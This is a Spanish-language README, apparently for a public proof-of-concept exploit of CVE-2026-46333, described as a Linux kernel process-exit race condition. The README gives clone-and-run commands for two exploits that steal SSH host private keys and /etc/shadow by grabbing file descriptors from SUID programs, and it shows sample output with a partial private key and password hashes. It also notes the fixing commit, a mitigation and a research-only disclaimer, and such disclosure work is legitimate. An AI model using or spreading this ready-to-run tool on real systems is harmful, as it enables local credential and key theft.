
CVE-2026-46333
Prueba de concepto de alta calidad para la vulnerabilidad de condición de carrera en el kernel de Linux
Un exploit de prueba de concepto limpio y fiable para CVE-2026-46333 — Divulgación de información local mediante condición de carrera en la ruta de salida de procesos del kernel de Linux.
Robando con éxito la clave privada SSH del host y /etc/shadow en Kali Linux
CVE-2026-46333 (también conocido como ssh-keysign-pwn) es una condición de carrera en la lógica de ptrace y salida de procesos del kernel de Linux (do_exit() → exit_mm() antes de exit_files()).
Cuando un proceso privilegiado (por ejemplo, SUID ssh-keysign o chage) tiene mm == NULL durante la salida, se omite la comprobación de volcabilidad, lo que permite a un atacante local no privilegiado usar pidfd_getfd() para robar descriptores de archivo abiertos.
Impacto:
/etc/ssh/ssh_host_*_key)/etc/shadowDescubierto por: Qualys
Corregido en: Commit del kernel 31e62c2ebbfdc3fe3dbdf5e02c92a9dc67087a3a (Mayo 2026)
/etc/shadow mediante chagegit clone https://github.com/0xBlackash/CVE-2026-46333.git
cd CVE-2026-46333
sudo ./CVE-2026-46333
sudo ./CVE-2026-46333-shadow
| Archivo | Descripción |
|---|---|
cve-2026-46333.c | Robo de claves privadas SSH del host |
cve-2026-46333-shadow.c | Robo de /etc/shadow mediante chage |
README.md | Este archivo |
Robo de clave SSH:
[+] SUCCESS! Stolen fd 3 -> /etc/ssh/ssh_host_ecdsa_key (round 0)
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAAB...
Robo de shadow:
[+] SUCCESS! Stolen /etc/shadow (round 0)
root:*:19953:0:99999:7:::
kali:$y$j9T$zY1oKFxJlTgP2WcJhzbNl1$...
31e62c2ebbfd...EnableSSHKeysign en sshd_config si no es necesarioEste exploit es únicamente con fines educativos y de investigación en seguridad.
Úselo solo en sistemas que posea o para los que tenga permiso explícito por escrito para realizar pruebas.
El autor no se responsabiliza por cualquier uso indebido o daño.
Este proyecto está licenciado bajo la Licencia MIT — siéntase libre de usarlo, modificarlo y distribuirlo.
Hecho con ❤️ para la comunidad de seguridad
Mantener los sistemas actualizados es la mejor defensa.